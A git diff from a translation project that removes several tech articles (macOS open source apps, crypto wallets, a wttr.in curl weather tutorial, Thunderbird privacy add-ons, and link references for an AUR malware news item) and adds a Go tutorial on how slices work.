||||||
--------------------------------------------------------------------------------
|
|
||||||
|
|
||||||
via: https://www.linuxuprising.com/2018/07/malware-found-on-arch-user-repository.html
|
|
||||||
|
|
||||||
作者:[Logix][a]
|
|
||||||
选题:[lujun9972](https://github.com/lujun9972)
|
|
||||||
译者:[译者ID](https://github.com/译者ID)
|
|
||||||
校对:[校对者ID](https://github.com/校对者ID)
|
|
||||||
|
|
||||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
|
||||||
|
|
||||||
[a]:https://plus.google.com/118280394805678839070
|
|
||||||
[1]:https://www.archlinux.org/
|
|
||||||
[2]:https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html
|
|
||||||
[3]:https://aur.archlinux.org/
|
|
||||||
[4]:https://lists.archlinux.org/pipermail/aur-general/2018-July/034152.html
|
|
||||||
[5]:https://aur.archlinux.org/cgit/aur.git/commit/?h=acroread&id=b3fec9f2f16703c2dae9e793f75ad6e0d98509bc
|
|
||||||
[6]:https://www.reddit.com/r/archlinux/comments/8x0p5z/reminder_to_always_read_your_pkgbuilds/e21iugg/
|
|
||||||
[7]:https://www.linuxuprising.com/2018/05/malware-found-in-ubuntu-snap-store.html
|
|
@ -1,74 +0,0 @@
|
|||||||
15 open source applications for MacOS
|
|
||||||
======
|
|
||||||
|
|
||||||
![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/computer_keyboard_laptop_development_blue.png?itok=IfckxN48)
|
|
||||||
|
|
||||||
I use open source tools whenever and wherever I can. I returned to college a while ago to earn a master's degree in educational leadership. Even though I switched from my favorite Linux laptop to a MacBook Pro (since I wasn't sure Linux would be accepted on campus), I decided I would keep using my favorite tools, even on MacOS, as much as I could.
|
|
||||||
|
|
||||||
Fortunately, it was easy, and no professor ever questioned what software I used. Even so, I couldn't keep a secret.
|
|
||||||
|
|
||||||
I knew some of my classmates would eventually assume leadership positions in school districts, so I shared information about the open source applications described below with many of my MacOS or Windows-using classmates. After all, open source software is really about freedom and goodwill. I also wanted them to know that it would be easy to provide their students with world-class applications at little cost. Most of them were surprised and amazed because, as we all know, open source software doesn't have a marketing team except users like you and me.
|
|
||||||
|
|
||||||
### My MacOS learning curve
|
|
||||||
|
|
||||||
Through this process, I learned some of the nuances of MacOS. While most of the open source tools worked as I was used to, others required different installation methods. Tools like [yum][1], [DNF][2], and [APT][3] do not exist in the MacOS world—and I really missed them.
|
|
||||||
|
|
||||||
Some MacOS applications required dependencies and installations that were more difficult than what I was accustomed to with Linux. Nonetheless, I persisted. In the process, I learned how I could keep the best software on my new platform. Even much of MacOS's core is [open source][4].
|
|
||||||
|
|
||||||
Also, my Linux background made it easy to get comfortable with the MacOS command line. I still use it to create and copy files, add users, and use other [utilities][5]like cat, tac, more, less, and tail.
|
|
||||||
|
|
||||||
### 15 great open source applications for MacOS
|
|
||||||
|
|
||||||
* The college required that I submit most of my work electronically in DOCX format, and I did that easily, first with [OpenOffice][6] and later using [LibreOffice][7] to produce my papers.
|
|
||||||
* When I needed to produce graphics for presentations, I used my favorite graphics applications, [GIMP][8] and [Inkscape][9].
|
|
||||||
* My favorite podcast creation tool is [Audacity][10]. It's much simpler to use than the proprietary application that ships with the Mac. I use it to record interviews and create soundtracks for video presentations.
|
|
||||||
* I discovered early on that I could use the [VideoLan][11] (VLC) media player on MacOS.
|
|
||||||
* MacOS's built-in proprietary video creation tool is a good product, but you can easily install and use [OpenShot][12], which is a great content creation tool.
|
|
||||||
* When I need to analyze networks for my clients, I use the easy-to-install [Nmap][13] (Network Mapper) and [Wireshark][14] tools on my Mac.
|
|
||||||
* I use [VirtualBox][15] for MacOS to demonstrate Raspbian, Fedora, Ubuntu, and other Linux distributions, as well as Moodle, WordPress, Drupal, and Koha when I provide training for librarians and other educators.
|
|
||||||
* I make boot drives on my MacBook using [Etcher.io][16]. I just download the ISO file and burn it on a USB stick drive.
|
|
||||||
* I think [Firefox][17] is easier and more secure to use than the proprietary browser that comes with the MacBook Pro, and it allows me to synchronize my bookmarks across operating systems.
|
|
||||||
* When it comes to eBook readers, [Calibre][18] cannot be beaten. It is easy to download and install, and you can even configure it for a [classroom eBook server][19] with a few clicks.
|
|
||||||
* Recently I have been teaching Python to middle school students, I have found it is easy to download and install Python 3 and the IDLE3 editor from [Python.org][20]. I have also enjoyed learning about data science and sharing that with students. Whether you're interested in Python or R, I recommend you download and [install][21] the [Anaconda distribution][22]. It contains the great iPython editor, RStudio, Jupyter Notebooks, and JupyterLab, along with some other applications.
|
|
||||||
* [HandBrake][23] is a great way to turn your old home video DVDs into MP4s, which you can share on YouTube, Vimeo, or your own [Kodi][24] server on MacOS.
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
Now it's your turn: What open source software are you using on MacOS (or Windows)? Share your favorites in the comments.
|
|
||||||
|
|
||||||
--------------------------------------------------------------------------------
|
|
||||||
|
|
||||||
via: https://opensource.com/article/18/7/open-source-tools-macos
|
|
||||||
|
|
||||||
作者:[Don Watkins][a]
|
|
||||||
选题:[lujun9972](https://github.com/lujun9972)
|
|
||||||
译者:[译者ID](https://github.com/译者ID)
|
|
||||||
校对:[校对者ID](https://github.com/校对者ID)
|
|
||||||
|
|
||||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
|
||||||
|
|
||||||
[a]:https://opensource.com/users/don-watkins
|
|
||||||
[1]:https://en.wikipedia.org/wiki/Yum_(software)
|
|
||||||
[2]:https://en.wikipedia.org/wiki/DNF_(software)
|
|
||||||
[3]:https://en.wikipedia.org/wiki/APT_(Debian)
|
|
||||||
[4]:https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/SystemTechnology/SystemTechnology.html
|
|
||||||
[5]:https://www.gnu.org/software/coreutils/coreutils.html
|
|
||||||
[6]:https://www.openoffice.org/
|
|
||||||
[7]:https://www.libreoffice.org/
|
|
||||||
[8]:https://www.gimp.org/
|
|
||||||
[9]:https://inkscape.org/en/
|
|
||||||
[10]:https://www.audacityteam.org/
|
|
||||||
[11]:https://www.videolan.org/index.html
|
|
||||||
[12]:https://www.openshot.org/
|
|
||||||
[13]:https://nmap.org/
|
|
||||||
[14]:https://www.wireshark.org/
|
|
||||||
[15]:https://www.virtualbox.org/
|
|
||||||
[16]:https://etcher.io/
|
|
||||||
[17]:https://www.mozilla.org/en-US/firefox/new/
|
|
||||||
[18]:https://calibre-ebook.com/
|
|
||||||
[19]:https://opensource.com/article/17/6/raspberrypi-ebook-server
|
|
||||||
[20]:https://www.python.org/downloads/release/python-370/
|
|
||||||
[21]:https://opensource.com/article/18/4/getting-started-anaconda-python
|
|
||||||
[22]:https://www.anaconda.com/download/#macos
|
|
||||||
[23]:https://handbrake.fr/
|
|
||||||
[24]:https://kodi.tv/download
|
|
@ -1,92 +0,0 @@
|
|||||||
6 open source cryptocurrency wallets
|
|
||||||
======
|
|
||||||
|
|
||||||
![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/bus_cash_register.jpg?itok=7NKVKuPa)
|
|
||||||
|
|
||||||
Without crypto wallets, cryptocurrencies like Bitcoin and Ethereum would just be another pie-in-the-sky idea. These wallets are essential for keeping, sending, and receiving cryptocurrencies.
|
|
||||||
|
|
||||||
The revolutionary growth of [cryptocurrencies][1] is attributed to the idea of decentralization, where a central authority is absent from the network and everyone has a level playing field. Open source technology is at the heart of cryptocurrencies and [blockchain][2] networks. It has enabled the vibrant, nascent industry to reap the benefits of decentralization—such as immutability, transparency, and security.
|
|
||||||
|
|
||||||
If you're looking for a free and open source cryptocurrency wallet, read on to start exploring whether any of the following options meet your needs.
|
|
||||||
|
|
||||||
### 1\. Copay
|
|
||||||
|
|
||||||
[Copay][3] is an open source Bitcoin crypto wallet that promises convenient storage. The software is released under the [MIT License][4].
|
|
||||||
|
|
||||||
The Copay server is also open source. Therefore, developers and Bitcoin enthusiasts can assume complete control of their activities by deploying their own applications on the server.
|
|
||||||
|
|
||||||
The Copay wallet empowers you to take the security of your Bitcoin in your own hands, instead of trusting unreliable third parties. It allows you to use multiple signatories for approving transactions and supports the storage of multiple, separate wallets within the same app.
|
|
||||||
|
|
||||||
Copay is available for a range of platforms, such as Android, Windows, MacOS, Linux, and iOS.
|
|
||||||
|
|
||||||
### 2\. MyEtherWallet
|
|
||||||
|
|
||||||
As the name implies, [MyEtherWallet][5] (abbreviated MEW) is a wallet for Ethereum transactions. It is open source (under the [MIT License][6]) and is completely online, accessible through a web browser.
|
|
||||||
|
|
||||||
The wallet has a simple client-side interface, which allows you to participate in the Ethereum blockchain confidently and securely.
|
|
||||||
|
|
||||||
### 3\. mSIGNA
|
|
||||||
|
|
||||||
[mSIGNA][7] is a powerful desktop application for completing transactions on the Bitcoin network. It is released under the [MIT License][8] and is available for MacOS, Windows, and Linux.
|
|
||||||
|
|
||||||
The blockchain wallet provides you with complete control over your Bitcoin stash. Some of its features include user-friendliness, versatility, decentralized offline key generation capabilities, encrypted data backups, and multi-device synchronization.
|
|
||||||
|
|
||||||
### 4\. Armory
|
|
||||||
|
|
||||||
[Armory][9] is an open source wallet (released under the [GNU AGPLv3][10]) for producing and keeping Bitcoin private keys on your computer. It enhances security by providing users with cold storage and multi-signature support capabilities.
|
|
||||||
|
|
||||||
With Armory, you can set up a wallet on a computer that is completely offline; you'll use the watch-only feature for observing your Bitcoin details on the internet, which improves security. The wallet also allows you to create multiple addresses and use them to complete different transactions.
|
|
||||||
|
|
||||||
Armory is available for MacOS, Windows, and several flavors of Linux (including Raspberry Pi).
|
|
||||||
|
|
||||||
### 5\. Electrum
|
|
||||||
|
|
||||||
[Electrum][11] is a Bitcoin wallet that navigates the thin line between beginner user-friendliness and expert functionality. The open source wallet is released under the [MIT License][12].
|
|
||||||
|
|
||||||
Electrum encrypts your private keys locally, supports cold storage, and provides multi-signature capabilities with minimal resource usage on your machine.
|
|
||||||
|
|
||||||
It is available for a wide range of operating systems and devices, including Windows, MacOS, Android, iOS, and Linux, and hardware wallets such as [Trezor][13].
|
|
||||||
|
|
||||||
### 6\. Etherwall
|
|
||||||
|
|
||||||
[Etherwall][14] is the first wallet for storing and sending Ethereum on the desktop. The open source wallet is released under the [GPLv3 License][15].
|
|
||||||
|
|
||||||
Etherwall is intuitive and fast. What's more, to enhance the security of your private keys, you can operate it on a full node or a thin node. Running it as a full-node client will enable you to download the whole Ethereum blockchain on your local machine.
|
|
||||||
|
|
||||||
Etherwall is available for MacOS, Linux, and Windows, and it also supports the Trezor hardware wallet.
|
|
||||||
|
|
||||||
### Words to the wise
|
|
||||||
|
|
||||||
Open source and free crypto wallets are playing a vital role in making cryptocurrencies easily available to more people.
|
|
||||||
|
|
||||||
Before using any digital currency software wallet, make sure to do your due diligence to protect your security, and always remember to comply with best practices for safeguarding your finances.
|
|
||||||
|
|
||||||
If your favorite open source cryptocurrency wallet is not on this list, please share what you know in the comment section below.
|
|
||||||
|
|
||||||
--------------------------------------------------------------------------------
|
|
||||||
|
|
||||||
via: https://opensource.com/article/18/7/crypto-wallets
|
|
||||||
|
|
||||||
作者:[Dr.Michael J.Garbade][a]
|
|
||||||
选题:[lujun9972](https://github.com/lujun9972)
|
|
||||||
译者:[译者ID](https://github.com/译者ID)
|
|
||||||
校对:[校对者ID](https://github.com/校对者ID)
|
|
||||||
|
|
||||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
|
||||||
|
|
||||||
[a]:https://opensource.com/users/drmjg
|
|
||||||
[1]:https://www.liveedu.tv/guides/cryptocurrency/
|
|
||||||
[2]:https://opensource.com/tags/blockchain
|
|
||||||
[3]:https://copay.io/
|
|
||||||
[4]:https://github.com/bitpay/copay/blob/master/LICENSE
|
|
||||||
[5]:https://www.myetherwallet.com/
|
|
||||||
[6]:https://github.com/kvhnuke/etherwallet/blob/mercury/LICENSE.md
|
|
||||||
[7]:https://ciphrex.com/
|
|
||||||
[8]:https://github.com/ciphrex/mSIGNA/blob/master/LICENSE
|
|
||||||
[9]:https://www.bitcoinarmory.com/
|
|
||||||
[10]:https://github.com/etotheipi/BitcoinArmory/blob/master/LICENSE
|
|
||||||
[11]:https://electrum.org/#home
|
|
||||||
[12]:https://github.com/spesmilo/electrum/blob/master/LICENCE
|
|
||||||
[13]:https://trezor.io/
|
|
||||||
[14]:https://www.etherwall.com/
|
|
||||||
[15]:https://github.com/almindor/etherwall/blob/master/LICENSE
|
|
@ -1,117 +0,0 @@
|
|||||||
Display Weather Forecast In Your Terminal With Wttr.in
|
|
||||||
======
|
|
||||||
**[wttr.in][1] is a feature-packed weather forecast service that supports displaying the weather from the command line**. It can automatically detect your location (based on your IP address), supports specifying the location or searching for a geographical location (like a site in a city, a mountain and so on), and much more. Oh, and **you don't have to install it - all you need to use it is cURL or Wget** (see below).
|
|
||||||
|
|
||||||
wttr.in features include:
|
|
||||||
|
|
||||||
* **displays the current weather as well as a 3-day weather forecast, split into morning, noon, evening and night** (includes temperature range, wind speed and direction, viewing distance, precipitation amount and probability)
|
|
||||||
|
|
||||||
* **can display Moon phases**
|
|
||||||
|
|
||||||
* **automatic location detection based on your IP address**
|
|
||||||
|
|
||||||
* **allows specifying a location using the city name, 3-letter airport code, area code, GPS coordinates, IP address, or domain name**. You can also specify a geographical location like a lake, mountain, landmark, and so on)
|
|
||||||
|
|
||||||
* **supports multilingual location names** (the query string must be specified in Unicode)
|
|
||||||
|
|
||||||
* **supports specifying the language** in which the weather forecast should be displayed in (it supports more than 50 languages)
|
|
||||||
|
|
||||||
* **it uses USCS units for queries from the USA and the metric system for the rest of the world** , but you can change this by appending `?u` for USCS, and `?m` for the metric system (SI)
|
|
||||||
|
|
||||||
* **3 output formats: ANSI for the terminal, HTML for the browser, and PNG**.
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
Like I mentioned in the beginning of the article, to use wttr.in, all you need is cURL or Wget, but you can also
|
|
||||||
|
|
||||||
**Before using wttr.in, make sure cURL is installed.** In Debian, Ubuntu or Linux Mint (and other Debian or Ubuntu-based Linux distributions), install cURL using this command:
|
|
||||||
```
|
|
||||||
sudo apt install curl
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
### wttr.in command line examples
|
|
||||||
|
|
||||||
Get the weather for your location (wttr.in tries to guess your location based on your IP address):
|
|
||||||
```
|
|
||||||
curl wttr.in
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
Force cURL to resolve names to IPv4 addresses (in case you're having issues with IPv6 and wttr.in) by adding `-4` after `curl` :
|
|
||||||
```
|
|
||||||
curl -4 wttr.in
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
**Wget also works** (instead of cURL) if you want to retrieve the current weather and forecast as a png, or if you use it like this:
|
|
||||||
```
|
|
||||||
wget -O- -q wttr.in
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
You can replace `curl` with `wget -O- -q` in all the commands below if you prefer Wget over cURL.
|
|
||||||
|
|
||||||
Specify the location:
|
|
||||||
```
|
|
||||||
curl wttr.in/Dublin
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
Display weather information for a landmark (the Eiffel Tower in this example):
|
|
||||||
```
|
|
||||||
curl wttr.in/~Eiffel+Tower
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
Get the weather information for an IP address' location (the IP below belongs to GitHub):
|
|
||||||
```
|
|
||||||
curl wttr.in/@192.30.253.113
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
Retrieve the weather using USCS units:
|
|
||||||
```
|
|
||||||
curl wttr.in/Paris?u
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
Force wttr.in to use the metric system (SI) if you're in the USA:
|
|
||||||
```
|
|
||||||
curl wttr.in/New+York?m
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
Use Wget to download the current weather and 3-day forecast as a PNG image:
|
|
||||||
```
|
|
||||||
wget wttr.in/Istanbul.png
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
You can specify the PNG
|
|
||||||
|
|
||||||
**For many other examples, check out the wttr.in[project page][2] or type this in a terminal:**
|
|
||||||
```
|
|
||||||
curl wttr.in/:help
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
||||||
--------------------------------------------------------------------------------
|
|
||||||
|
|
||||||
via: https://www.linuxuprising.com/2018/07/display-weather-forecast-in-your.html
|
|
||||||
|
|
||||||
作者:[Logix][a]
|
|
||||||
选题:[lujun9972](https://github.com/lujun9972)
|
|
||||||
译者:[译者ID](https://github.com/译者ID)
|
|
||||||
校对:[校对者ID](https://github.com/校对者ID)
|
|
||||||
|
|
||||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
|
||||||
|
|
||||||
[a]:https://plus.google.com/118280394805678839070
|
|
||||||
[1]:https://wttr.in/
|
|
||||||
[2]:https://github.com/chubin/wttr.in
|
|
||||||
[3]:https://github.com/chubin/wttr.in#installation
|
|
||||||
[4]:https://github.com/schachmat/wego
|
|
||||||
[5]:https://github.com/chubin/wttr.in#supported-formats
|
|
@ -1,65 +0,0 @@
|
|||||||
translating---geekpi
|
|
||||||
|
|
||||||
4 add-ons to improve your privacy on Thunderbird
|
|
||||||
======
|
|
||||||
|
|
||||||
![](https://fedoramagazine.org/wp-content/uploads/2017/08/tb-privacy-addons-816x345.jpg)
|
|
||||||
Thunderbird is a popular free email client developed by [Mozilla][1]. Similar to Firefox, Thunderbird offers a large choice of add-ons for extra features and customization. This article focuses on four add-ons to improve your privacy.
|
|
||||||
|
|
||||||
### Enigmail
|
|
||||||
|
|
||||||
Encrypting emails using GPG (GNU Privacy Guard) is the best way to keep their contents private. If you aren’t familiar with GPG, [check out our primer right here][2] on the Magazine.
|
|
||||||
|
|
||||||
[Enigmail][3] is the go-to add-on for using OpenPGP with Thunderbird. Indeed, Enigmail integrates well with Thunderbird, and lets you encrypt, decrypt, and digitally sign and verify emails.
|
|
||||||
|
|
||||||
### Paranoia
|
|
||||||
|
|
||||||
[Paranoia][4] gives you access to critical information about your incoming emails. An emoticon shows the encryption state between servers an email traveled through before reaching your inbox.
|
|
||||||
|
|
||||||
A yellow, happy emoticon tells you all connections were encrypted. A blue, sad emoticon means one connection was not encrypted. Finally, a red, scared emoticon shows on more than one connection the message wasn’t encrypted.
|
|
||||||
|
|
||||||
More details about these connections are available, so you can check which servers were used to deliver the email.
|
|
||||||
|
|
||||||
### Sensitivity Header
|
|
||||||
|
|
||||||
[Sensitivity Header][5] is a simple add-on that lets you select the privacy level of an outgoing email. Using the option menu, you can select a sensitivity: Normal, Personal, Private and Confidential.
|
|
||||||
|
|
||||||
Adding this header doesn’t add extra security to email. However, some email clients or mail transport/user agents (MTA/MUA) can use this header to process the message differently based on the sensitivity.
|
|
||||||
|
|
||||||
Note that this add-on is marked as experimental by its developers.
|
|
||||||
|
|
||||||
### TorBirdy
|
|
||||||
|
|
||||||
If you’re really concerned about your privacy, [TorBirdy][6] is the add-on for you. It configures Thunderbird to use the [Tor][7] network.
|
|
||||||
|
|
||||||
TorBirdy offers less privacy on email accounts that have been used without Tor before, as noted in the [documentation][8].
|
|
||||||
|
|
||||||
> Please bear in mind that email accounts that have been used without Tor before offer **less** privacy/anonymity/weaker pseudonyms than email accounts that have always been accessed with Tor. But nevertheless, TorBirdy is still useful for existing accounts or real-name email addresses. For example, if you are looking for location anonymity — you travel a lot and don’t want to disclose all your locations by sending emails — TorBirdy works wonderfully!
|
|
||||||
|
|
||||||
Note that to use this add-on, you must have Tor installed on your system.
|
|
||||||
|
|
||||||
Photo by [Braydon Anderson][9] on [Unsplash][10].
|
|
||||||
|
|
||||||
|
|
||||||
--------------------------------------------------------------------------------
|
|
||||||
|
|
||||||
via: https://fedoramagazine.org/4-addons-privacy-thunderbird/
|
|
||||||
|
|
||||||
作者:[Clément Verna][a]
|
|
||||||
选题:[lujun9972](https://github.com/lujun9972)
|
|
||||||
译者:[译者ID](https://github.com/译者ID)
|
|
||||||
校对:[校对者ID](https://github.com/校对者ID)
|
|
||||||
|
|
||||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
|
||||||
|
|
||||||
[a]:https://fedoramagazine.org
|
|
||||||
[1]:https://www.mozilla.org/en-US/
|
|
||||||
[2]:https://fedoramagazine.org/gnupg-a-fedora-primer/
|
|
||||||
[3]:https://addons.mozilla.org/en-US/thunderbird/addon/enigmail/
|
|
||||||
[4]:https://addons.mozilla.org/en-US/thunderbird/addon/paranoia/?src=cb-dl-users
|
|
||||||
[5]:https://addons.mozilla.org/en-US/thunderbird/addon/sensitivity-header/?src=cb-dl-users
|
|
||||||
[6]:https://addons.mozilla.org/en-US/thunderbird/addon/torbirdy/?src=cb-dl-users
|
|
||||||
[7]:https://www.torproject.org/
|
|
||||||
[8]:https://trac.torproject.org/projects/tor/wiki/torbirdy
|
|
||||||
[9]:https://unsplash.com/photos/wOHH-NUTvVc?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText
|
|
||||||
[10]:https://unsplash.com/search/photos/privacy?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText
|
|
@ -1,3 +1,4 @@
|
|||||||
|
Translating by qhwdw
|
||||||
A sysadmin's guide to SELinux: 42 answers to the big questions
|
A sysadmin's guide to SELinux: 42 answers to the big questions
|
||||||
======
|
======
|
||||||
|
|
||||||
|
263
sources/tech/20180712 Slices from the ground up.md
Normal file
263
sources/tech/20180712 Slices from the ground up.md
Normal file
@ -0,0 +1,263 @@
|
|||||||
|
name1e5s is translating
|
||||||
|
|
||||||
|
|
||||||
|
Slices from the ground up
|
||||||
|
============================================================
|
||||||
|
|
||||||
|
This blog post was inspired by a conversation with a co-worker about using a slice as a stack. The conversation turned into a wider discussion on the way slices work in Go, so I thought it would be useful to write it up.
|
||||||
|
|
||||||
|
### Arrays
|
||||||
|
|
||||||
|
Every discussion of Go’s slice type starts by talking about something that isn’t a slice, namely, Go’s array type. Arrays in Go have two relevant properties:
|
||||||
|
|
||||||
|
1. They have a fixed size; `[5]int` is both an array of 5 `int`s and is distinct from `[3]int`.
|
||||||
|
|
||||||
|
2. They are value types. Consider this example:
|
||||||
|
```
|
||||||
|
package main
|
||||||
|
|
||||||
|
import "fmt"
|
||||||
|
|
||||||
|
func main() {
|
||||||
|
var a [5]int
|
||||||
|
b := a
|
||||||
|
b[2] = 7
|
||||||
|
fmt.Println(a, b) // prints [0 0 0 0 0] [0 0 7 0 0]
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
The statement `b := a` declares a new variable, `b`, of type `[5]int`, and _copies _ the contents of `a` to `b`. Updating `b` has no effect on the contents of `a` because `a` and `b` are independent values.[1][1]
|
||||||
|
|
||||||
|
### Slices
|
||||||
|
|
||||||
|
Go’s slice type differs from its array counterpart in two important ways:
|
||||||
|
|
||||||
|
1. Slices do not have a fixed length. A slice’s length is not declared as part of its type, rather it is held within the slice itself and is recoverable with the built-in function `len`.[2][2]
|
||||||
|
|
||||||
|
2. Assigning one slice variable to another _does not_ make a copy of the slices contents. This is because a slice does not directly hold its contents. Instead a slice holds a pointer to its _underlying_ array[3][3] which holds the contents of the slice.
|
||||||
|
|
||||||
|
As a result of the second property, two slices can share the same underlying array. Consider these examples:
|
||||||
|
|
||||||
|
1. Slicing a slice:
|
||||||
|
```
|
||||||
|
package main
|
||||||
|
|
||||||
|
import "fmt"
|
||||||
|
|
||||||
|
func main() {
|
||||||
|
var a = []int{1,2,3,4,5}
|
||||||
|
b := a[2:]
|
||||||
|
b[0] = 0
|
||||||
|
fmt.Println(a, b) // prints [1 2 0 4 5] [0 4 5]
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
In this example `a` and `b` share the same underlying array–even though `b` starts at a different offset in that array, and has a different length. Changes to the underlying array via `b` are thus visible to `a`.
|
||||||
|
|
||||||
|
2. Passing a slice to a function:
|
||||||
|
```
|
||||||
|
package main
|
||||||
|
|
||||||
|
import "fmt"
|
||||||
|
|
||||||
|
func negate(s []int) {
|
||||||
|
for i := range s {
|
||||||
|
s[i] = -s[i]
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func main() {
|
||||||
|
var a = []int{1, 2, 3, 4, 5}
|
||||||
|
negate(a)
|
||||||
|
fmt.Println(a) // prints [-1 -2 -3 -4 -5]
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
In this example `a` is passed to `negate`as the formal parameter `s.` `negate` iterates over the elements of `s`, negating their sign. Even though `negate` does not return a value, or have any way to access the declaration of `a` in `main`, the contents of `a` are modified when passed to `negate`.
|
||||||
|
|
||||||
|
Most programmers have an intuitive understanding of how a Go slice’s underlying array works because it matches how array-like concepts in other languages tend to work. For example, here’s the first example of this section rewritten in Python:
|
||||||
|
|
||||||
|
```
|
||||||
|
Python 2.7.10 (default, Feb 7 2017, 00:08:15)
|
||||||
|
[GCC 4.2.1 Compatible Apple LLVM 8.0.0 (clang-800.0.34)] on darwin
|
||||||
|
Type "help", "copyright", "credits" or "license" for more information.
|
||||||
|
>>> a = [1,2,3,4,5]
|
||||||
|
>>> b = a
|
||||||
|
>>> b[2] = 0
|
||||||
|
>>> a
|
||||||
|
[1, 2, 0, 4, 5]
|
||||||
|
```
|
||||||
|
|
||||||
|
And also in Ruby:
|
||||||
|
|
||||||
|
```
|
||||||
|
irb(main):001:0> a = [1,2,3,4,5]
|
||||||
|
=> [1, 2, 3, 4, 5]
|
||||||
|
irb(main):002:0> b = a
|
||||||
|
=> [1, 2, 3, 4, 5]
|
||||||
|
irb(main):003:0> b[2] = 0
|
||||||
|
=> 0
|
||||||
|
irb(main):004:0> a
|
||||||
|
=> [1, 2, 0, 4, 5]
|
||||||
|
```
|
||||||
|
|
||||||
|
The same applies to most languages that treat arrays as objects or reference types.[4][8]
|
||||||
|
|
||||||
|
### The slice header value
|
||||||
|
|
||||||
|
The magic that makes a slice behave both as a value and a pointer is to understand that a slice is actually a struct type. This is commonly referred to as a _slice header_ after its [counterpart in the reflect package][20]. The definition of a slice header looks something like this:
|
||||||
|
|
||||||
|
![](https://dave.cheney.net/wp-content/uploads/2018/07/slice.001-300x257.png)
|
||||||
|
|
||||||
|
```
|
||||||
|
package runtime
|
||||||
|
|
||||||
|
type slice struct {
|
||||||
|
ptr unsafe.Pointer
|
||||||
|
len int
|
||||||
|
cap int
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
This is important because [_unlike_ `map` and `chan`types][21] slices are value types and are _copied_ when assigned or passed as arguments to functions.
|
||||||
|
|
||||||
|
To illustrate this, programmers instinctively understand that `square`‘s formal parameter `v` is an independent copy of the `v` declared in `main`.
|
||||||
|
|
||||||
|
```
|
||||||
|
package main
|
||||||
|
|
||||||
|
import "fmt"
|
||||||
|
|
||||||
|
func square(v int) {
|
||||||
|
v = v * v
|
||||||
|
}
|
||||||
|
|
||||||
|
func main() {
|
||||||
|
v := 3
|
||||||
|
square(v)
|
||||||
|
fmt.Println(v) // prints 3, not 9
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
So the operation of `square` on its `v` has no effect on `main`‘s `v`. So too the formal parameter `s` of `double` is an independent copy of the slice `s` declared in `main`, _not_ a pointer to `main`‘s `s` value.
|
||||||
|
|
||||||
|
```
|
||||||
|
package main
|
||||||
|
|
||||||
|
import "fmt"
|
||||||
|
|
||||||
|
func double(s []int) {
|
||||||
|
s = append(s, s...)
|
||||||
|
}
|
||||||
|
|
||||||
|
func main() {
|
||||||
|
s := []int{1, 2, 3}
|
||||||
|
double(s)
|
||||||
|
fmt.Println(s, len(s)) // prints [1 2 3] 3
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
The slightly unusual nature of a Go slice variable is it’s passed around as a value, not than a pointer. 90% of the time when you declare a struct in Go, you will pass around a pointer to values of that struct.[5][9] This is quite uncommon, the only other example of passing a struct around as a value I can think of off hand is `time.Time`.
|
||||||
|
|
||||||
|
It is this exceptional behaviour of slices as values, rather than pointers to values, that can confuses Go programmer’s understanding of how slices work. Just remember that any time you assign, subslice, or pass or return, a slice, you’re making a copy of the three fields in the slice header; the pointer to the underlying array, and the current length and capacity.
|
||||||
|
|
||||||
|
### Putting it all together
|
||||||
|
|
||||||
|
I’m going to conclude this post on the example of a slice as a stack that I opened this post with:
|
||||||
|
|
||||||
|
```
|
||||||
|
package main
|
||||||
|
|
||||||
|
import "fmt"
|
||||||
|
|
||||||
|
func f(s []string, level int) {
|
||||||
|
if level > 5 {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
s = append(s, fmt.Sprint(level))
|
||||||
|
f(s, level+1)
|
||||||
|
fmt.Println("level:", level, "slice:", s)
|
||||||
|
}
|
||||||
|
|
||||||
|
func main() {
|
||||||
|
f(nil, 0)
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
Starting from `main` we pass a `nil` slice into `f` as `level` 0\. Inside `f` we append to `s` the current `level`before incrementing `level` and recursing. Once `level` exceeds 5, the calls to `f` return, printing their current level and the contents of their copy of `s`.
|
||||||
|
|
||||||
|
```
|
||||||
|
level: 5 slice: [0 1 2 3 4 5]
|
||||||
|
level: 4 slice: [0 1 2 3 4]
|
||||||
|
level: 3 slice: [0 1 2 3]
|
||||||
|
level: 2 slice: [0 1 2]
|
||||||
|
level: 1 slice: [0 1]
|
||||||
|
level: 0 slice: [0]
|
||||||
|
```
|
||||||
|
|
||||||
|
